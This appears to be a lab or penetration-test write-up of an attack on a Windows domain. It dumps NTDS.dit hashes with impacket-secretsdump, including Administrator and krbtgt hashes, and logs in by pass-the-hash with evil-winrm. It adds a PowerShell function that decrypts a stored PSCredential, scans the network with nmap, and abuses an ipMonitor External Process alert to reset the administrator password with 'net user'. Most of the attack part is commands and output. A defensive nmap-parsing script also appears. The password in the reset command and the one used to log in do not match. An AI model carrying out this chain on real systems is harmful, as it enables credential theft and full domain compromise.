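Both output files then go to `impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV local` exactly as below; leaving the shadow copy and the metadata cab behind is the most common trace this technique leaves on a DC, which is why the cleanup step is in the function rather than left for later.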
Extract the credentials offline with impacket-secretsdump
$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x89a11ee03c83c2e093cc9f14ef3800ab
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 81db2a47d32784558062c54bfad8d792
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8cb646a4485952a76117a33686bceef3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:fb89d657b52110d30c169f103b6ce216:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:12b0dffbe4f3835ae32bea420c1b5a76:::
SQL01$:1103:aad3b435b51404eeaad3b435b51404ee:04ac3c85573b3b32865d442218394651:::
ILF-XRG$:1104:aad3b435b51404eeaad3b435b51404ee:6656bfee5d67c93f118b1f80ac63fc3e:::
MAINLON$:1105:aad3b435b51404eeaad3b435b51404ee:afb8942d32adc50ef1c25e34c7574e10:::
CISERVER$:1106:aad3b435b51404eeaad3b435b51404ee:41955c81b97f5d719965af5b7eb20759:::
<SNIP>
Credential Theft: log in to DC02 with the Administrator hash
evil-winrm -i 172.16.210.5 -u administrator -H 8cb646a4485952a76117a33686bceef3
In C:\Users\Administrator\Documents there is a file with the extension .Cred
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat svc_ipmi.Cred
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">svc_ipmi</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a839b52ca6a9c146ba898a954df8ee3a0000000002000000000003660000c000000010000000e02382774212b8748d49f70cf2acb3ba0000000004800000a000000010000000e67a0abc3bd895cbed1fccf9269154eb180000001dd70bbd086859fa24b317f632e71ec5ce2ce922090d497b140000009ced3f85e310d3b8f1acaaa756be95331ae8b233</SS>
    </Props>
  </Obj>
</Objs>
Asked ChatGPT how to read it: the file is an Export-Clixml dump of a PSCredential object, and the <SS> element is the password as a DPAPI-protected SecureString
The credential was read successfully
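How the .Cred file actually decrypts, as an added example that is not part of the original write-up. The <SS> blob starts with the DPAPI header (01000000d08c9ddf...) and was protected with the key of the user who ran Export-Clixml on this machine, so it only unwraps in a session running as that same account on that same host; here that is Administrator on DC02, which is where the evil-winrm shell is. Run elsewhere, ConvertTo-SecureString fails with "Key not valid for use in specified state". The file path is the one shown above; the function names are this example's own.

```powershell
# Added example (not from the original write-up): unwrap an Export-Clixml PSCredential.
function Read-ExportedCredential {
    param([Parameter(Mandatory)][string]$Path)
    try {
        # Import-Clixml rebuilds the PSCredential and DPAPI-decrypts the <SS> element in the process
        $cred  = Import-Clixml -Path $Path
        $plain = $cred.GetNetworkCredential().Password    # NetworkCredential exposes the SecureString as text
    } catch {
        # DPAPI scoping: wrong user or wrong machine for the blob, or a corrupted file
        throw "Could not decrypt $Path as $env:USERDOMAIN\$env:USERNAME on $env:COMPUTERNAME : $($_.Exception.Message)"
    }
    [pscustomobject]@{ UserName = $cred.UserName; Password = $plain; Source = $Path }
}

# Same operation when only the hex blob was copied out of the <SS> element (same DPAPI scoping applies)
function Read-ProtectedSecureString {
    param([Parameter(Mandatory)][string]$Hex)
    $secure = ConvertTo-SecureString -String $Hex          # no -Key: DPAPI under the current user's master key
    (New-Object System.Net.NetworkCredential('', $secure)).Password
}

Read-ExportedCredential -Path 'C:\Users\Administrator\Documents\svc_ipmi.Cred'
```

Operators who store credentials this way tend to assume the file is safe to leave on disk; it is only as safe as the DPAPI master key of the exporting account, and an attacker who already runs as that account (or who has dumped its master key) reads it in one line.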
Information Gathering: fping
$ fping -asqg 172.16.210.0/24
172.16.210.3
172.16.210.5
172.16.210.21
172.16.210.34

     254 targets
       4 alive
     250 unreachable
       0 unknown addresses

    1000 timeouts (waiting for response)
    1004 ICMP Echos sent
       4 ICMP Echo Replies received
       0 other ICMP received

 327 ms (min round trip time)
 378 ms (avg round trip time)
 475 ms (max round trip time)
        9.766 sec (elapsed real time)
nmap
$ nmap --open -PE -oA nmap_1k -iL host.list
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 15:06 EST
Nmap scan report for 172.16.210.21
Host is up (0.33s latency).
Not shown: 996 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8080/tcp open  http-proxy

Nmap scan report for 172.16.210.34
Host is up (0.35s latency).
Not shown: 997 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
873/tcp  open  rsync
8084/tcp open  websnp

Nmap done: 2 IP addresses (2 hosts up) scanned in 55.63 seconds
$ nmap --open -p- -A -PE -oA nmap_all -iL host.list
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 15:24 EST
WARNING: Service 172.16.210.34:8084 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 172.16.210.21
Host is up (0.28s latency).
Not shown: 65521 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http-proxy?
21410/tcp open  unknown
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port21410-TCP:V=7.94SVN%I=7%D=1/23%Time=6792A7C5%P=aarch64-unknown-linu SF:x-gnu%r(NULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06 SF:\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(Generi SF:cLines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x SF:20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(GetRequest,2 SF:E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe SF:\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(HTTPOptions,2E,"\0\0 SF:\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\ SF:0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(RTSPRequest,2E,"\0\0\x18\x0 SF:4\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01 SF:\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(RPCCheck,2E,"\0\0\x18\x04\0\0\0\0\ SF:0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x SF:08\0\0\0\0\0\0\?\0\x01")%r(DNSVersionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\ SF:0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04 SF:\x08\0\0\0\0\0\0\?\0\x01")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0 SF:\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x0 SF:4\x08\0\0\0\0\0\0\?\0\x01")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\ SF:0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\ SF:0\0\?\0\x01")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0 SF:\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\? 
SF:\0\x01")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0 SF:\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0 SF:\?\0\x01")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x0 SF:5\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\ SF:x01")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0 SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(SM SF:BProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0 SF:\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(X11Probe,2 SF:E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe SF:\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): IBM z/OS 2.1.X (85%) OS CPE: cpe:/o:ibm:zos:2.1 Aggressive OS guesses: IBM z/OS 2.1 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-01-23T20:37:34 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: ADMIN01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:7c:f9 (VMware) TRACEROUTE HOP RTT ADDRESS 1 279.59 ms 172.16.210.21 Nmap scan report for 172.16.210.34 Host is up (0.24s latency). 
Not shown: 65532 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 873/tcp open rsync (protocol version 31) 8084/tcp open rtsp |_rtsp-methods: ERROR: Script execution failed (use -d to debug) | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 500 Internal Server Error | Date: Thu, 23 Jan 2025 20:34:16 GMT | Server: Mono.WebServer.XSP/4.7.1.0 Linux | Connection: close | Connection: close | Content-Type: text/html; charset=us-ascii | Content-Length: 9169 | <?xml version="1.0" encoding="utf-8"?> | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <style type="text/css"> | body { background-color: #FFFFFF; font-size: .75em; font-family: Verdana, Helvetica, Sans-Serif; margin: 0; padding: 0; color: #696969; } | a:link { color: #000000; text-decoration: underline; } | a:visited { color: #000000; } | a:hover { color: #000000; text-decoration: none; } | a:active { color: #12eb87; } | margin-bottom: 20px; line-height: 1.6em; } | font-size: 1.2em; margin-left: 20px; margin-top: 0px; } | GetRequest: | HTTP/1.0 400 Bad request | Date: Thu, 23 Jan 2025 20:34:14 GMT | Server: Mono.WebServer.XSP/4.7.1.0 Linux | Connection: close | Connection: close | Date: Thu, 23 Jan 2025 20:34:14 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 4890 | <?xml version="1.0" encoding="utf-8"?> | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <style type="text/css"> | body { background-color: #FFFFFF; font-size: .75em; font-family: Verdana, Helvetica, Sans-Serif; margin: 0; padding: 0; color: #696969; } | a:link { color: #000000; text-decoration: underline; } | 
a:visited { color: #000000; } | a:hover { color: #000000; text-decoration: none; } | a:active { color: #12eb87; } | margin-bottom: 20px; line-height: 1.6em; } |_ font-size: 1.2em; margin-left: 20px; margin-top: 0px; } 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8084-TCP:V=7.94SVN%I=7%D=1/23%Time=6792A7C6%P=aarch64-unknown-linux SF:-gnu%r(GetRequest,140E,"HTTP/1\.0\x20400\x20Bad\x20request\r\nDate:\x20 SF:Thu,\x2023\x20Jan\x202025\x2020:34:14\x20GMT\r\nServer:\x20Mono\.WebSer SF:ver\.XSP/4\.7\.1\.0\x20Linux\r\nConnection:\x20close\r\nConnection:\x20 SF:close\r\nDate:\x20Thu,\x2023\x20Jan\x202025\x2020:34:14\x20GMT\r\nConte SF:nt-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x204890\r\n\ SF:r\n<\?xml\x20version=\"1\.0\"\x20encoding=\"utf-8\"\?>\n<!DOCTYPE\x20ht SF:ml\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transitional//EN\"\x2 SF:0\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\.dtd\">\n<html SF:\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\n<head>\n<style\x20type=\ SF:"text/css\">\nbody\x20{\x20background-color:\x20#FFFFFF;\x20font-size:\ SF:x20\.75em;\x20font-family:\x20Verdana,\x20Helvetica,\x20Sans-Serif;\x20 SF:margin:\x200;\x20padding:\x200;\tcolor:\x20#696969;\x20}\na:link\x20{\x SF:20color:\x20#000000;\x20text-decoration:\x20underline;\x20}\na:visited\ SF:x20{\x20color:\x20#000000;\x20}\na:hover\x20{\x20color:\x20#000000;\x20 SF:text-decoration:\x20none;\x20}\na:active\x20{\x20color:\x20#12eb87;\x20 SF:}\np,\x20ul\x20{\tmargin-bottom:\x2020px;\x20line-height:\x201\.6em;\x2 SF:0}\npre\x20{\x20font-size:\x201\.2em;\tmargin-left:\x2020px;\x20margin- SF:top:\x200px;\x20}\nh1,\x20")%r(FourOhFourRequest,24AD,"HTTP/1\.0\x20500 SF:\x20Internal\x20Server\x20Error\r\nDate:\x20Thu,\x2023\x20Jan\x202025\x SF:2020:34:16\x20GMT\r\nServer:\x20Mono\.WebServer\.XSP/4\.7\.1\.0\x20Linu 
SF:x\r\nConnection:\x20close\r\nConnection:\x20close\r\nContent-Type:\x20t SF:ext/html;\x20charset=us-ascii\r\nContent-Length:\x209169\r\n\r\n<\?xml\ SF:x20version=\"1\.0\"\x20encoding=\"utf-8\"\?>\n<!DOCTYPE\x20html\x20PUBL SF:IC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transitional//EN\"\x20\"http:// SF:www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\.dtd\">\n<html\x20xmlns= SF:\"http://www\.w3\.org/1999/xhtml\">\n<head>\n<style\x20type=\"text/css\ SF:">\nbody\x20{\x20background-color:\x20#FFFFFF;\x20font-size:\x20\.75em; SF:\x20font-family:\x20Verdana,\x20Helvetica,\x20Sans-Serif;\x20margin:\x2 SF:00;\x20padding:\x200;\tcolor:\x20#696969;\x20}\na:link\x20{\x20color:\x SF:20#000000;\x20text-decoration:\x20underline;\x20}\na:visited\x20{\x20co SF:lor:\x20#000000;\x20}\na:hover\x20{\x20color:\x20#000000;\x20text-decor SF:ation:\x20none;\x20}\na:active\x20{\x20color:\x20#12eb87;\x20}\np,\x20u SF:l\x20{\tmargin-bottom:\x2020px;\x20line-height:\x201\.6em;\x20}\npre\x2 SF:0{\x20font-size:\x201\.2em;\tmargin-left:\x2020px;\x20margin-top:\x200p SF:x;\x20}\nh1,\x20h2,\x20h3,\x20h4,\x20h5,\x20h6\x20{\x20fon"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): IBM z/OS 1.11.X|2.1.X (85%) OS CPE: cpe:/o:ibm:zos:1.11 cpe:/o:ibm:zos:2.1 Aggressive OS guesses: IBM z/OS 1.11 (85%), IBM z/OS 2.1 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 239.77 ms 172.16.210.34 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 2 IP addresses (2 hosts up) scanned in 904.39 seconds
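As an added defender's-side example (not from the original writeup), the Python below parses the normal-format .nmap report that the -oA run above writes and flags the two things in those results worth acting on first: ports whose service nmap could not identify, and the SMB host where message signing is enabled but not required. The report text is constructed to mirror the scan output above.

```python
"""Triage of the normal-format .nmap report that -oA writes.
Added example, not code from the original writeup: it walks each host
section, collects open ports and flags services nmap could not identify
and SMB hosts that do not require message signing."""
import re

# Constructed sample: a trimmed copy of the two host sections above.
SAMPLE_REPORT = """\
Nmap scan report for 172.16.210.21
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp  open  http-proxy?
21410/tcp open  unknown
| smb2-security-mode:
|_    Message signing enabled but not required
Nmap scan report for 172.16.210.34
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
873/tcp  open  rsync   (protocol version 31)
8084/tcp open  rtsp
"""
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def parse_report(text):
    """Return {host: {"ports": [(port, service, version)], "findings": [...]}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:  # a new host section starts here
            current = hosts.setdefault(m.group(1), {"ports": [], "findings": []})
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            port, service, version = int(m.group(1)), m.group(3), m.group(4).strip()
            current["ports"].append((port, service, version))
            # nmap marks a guessed service with '?' and a failed match as 'unknown'
            if service.endswith("?") or service == "unknown":
                current["findings"].append(f"unidentified service on {port}/{m.group(2)}")
        elif "Message signing enabled but not required" in line:
            current["findings"].append("SMB signing not required")
    return hosts


if __name__ == "__main__":
    for host, info in parse_report(SAMPLE_REPORT).items():
        print(host, [p for p, _, _ in info["ports"]], info["findings"])
```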
Web Application
172.16.210.21:8080
Log in with the stolen credentials.
Check the version information.
Official documentation: Create an alert in ipMonitor External Process monitor
At http://172.16.210.21:8080/cfg/cgi?sid=293795323809&area=self&action=config& choose Alert List.
Add Alert.
Add Monitors, then select ADMIN01 C:\ Drivespace.
Add Action, choose External Process; this redirects to a new page.
On that page, fill in the Identification and Action Parameters forms.
Then click Force Test in the menu bar, which executes the command below and changes the administrator's password:
```
/c "net user administrator NewPasswrod123!"
```
Use evil-winrm to connect to the Admin01 machine with:
```
administrator:NewPassword123!
```
172.16.210.34:8084